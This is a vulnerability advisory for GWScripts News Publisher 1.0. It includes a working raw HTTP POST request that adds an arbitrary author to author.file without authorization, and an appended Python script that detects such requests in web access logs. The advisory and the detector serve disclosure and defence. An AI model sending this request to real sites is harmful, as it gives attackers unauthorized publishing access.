GWScripts News Publisher author.file Write Vulnerability
| Bugtraq ID: | 1621 |
| Class: | Origin Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Aug 29 2000 12:00AM |
| Updated: | Aug 29 2000 12:00AM |
| Credit: | Posted to Bugtraq by n30 <[email protected]> on August 29, 2000. |
| Vulnerable: | GWScripts News Publisher 1.0 6; GWScripts News Publisher 1.0 5b; GWScripts News Publisher 1.0 5a; GWScripts News Publisher 1.0 5 |
| Not Vulnerable: | |
Discussion
It is possible for a remote user to add an author to the author index (author.file) in GWScripts News Publisher, a web news publisher. This can be done by sending the following raw HTTP request with an arbitrary username and password:
POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: user/browser
Host: target
Referer: http://target/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71
author=<username>&apassword=<password>&email=<email address>&name=<username>&password=<password>
Exploit / POC
n30 <[email protected]> has released the following exploit:
Solution / Fix
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
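With no vendor patch listed, the addAuthor request from the Discussion section can at least be looked for in web server access logs, since the action name travels in the query string. The following is an added detection example, not part of the original advisory or of GWScripts code; the Common Log Format input, the sample lines and the `trusted_ips` parameter are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access log (Common Log Format, documentation-range IPs).
# "?otherAction" is a made-up query string used only as a negative case.
SAMPLE_LOG = """\
192.0.2.10 - - [29/Aug/2000:10:01:02 +0000] "GET /cgi-bin/news/news.cgi HTTP/1.0" 200 5120
198.51.100.7 - - [29/Aug/2000:10:03:44 +0000] "POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0" 200 312
192.0.2.10 - - [29/Aug/2000:10:05:00 +0000] "POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0" 200 305
198.51.100.7 - - [29/Aug/2000:10:06:13 +0000] "POST /CGI-BIN/news/news.cgi?addauthor HTTP/1.0" 200 312
203.0.113.5 - - [29/Aug/2000:10:07:30 +0000] "POST /cgi-bin/news/news.cgi?otherAction HTTP/1.0" 200 900
this line is not in Common Log Format
"""

# host ident user [timestamp] "METHOD target protocol" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')


def find_add_author(log_text, trusted_ips=frozenset()):
    """Return {client_ip: [(timestamp, status), ...]} for POSTs to
    news.cgi?addAuthor that did not come from a trusted address.

    trusted_ips is a hypothetical allow-list of administrator addresses.
    The advisory says any username/password is accepted, so the source
    address is the only distinguishing field an access log offers.
    """
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue  # ignore lines that do not parse as CLF
        ip, ts, method, target, status = m.groups()
        path, _, query = target.partition("?")
        # Decode percent-escapes and compare case-insensitively so trivial
        # spelling variants of the path or action are still caught.
        action = re.split(r"[&=;]", unquote(query).lower())[0]
        if (method.upper() == "POST"
                and unquote(path).lower().endswith("/news.cgi")
                and action == "addauthor"
                and ip not in trusted_ips):
            hits[ip].append((ts, int(status)))
    return dict(hits)


if __name__ == "__main__":
    for ip, events in find_add_author(SAMPLE_LOG, {"192.0.2.10"}).items():
        print(ip, events)
```

Any hit should be compared against the entries in author.file to confirm whether an unexpected author was added.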
References
References:
- News Publisher Homepage (GWScripts)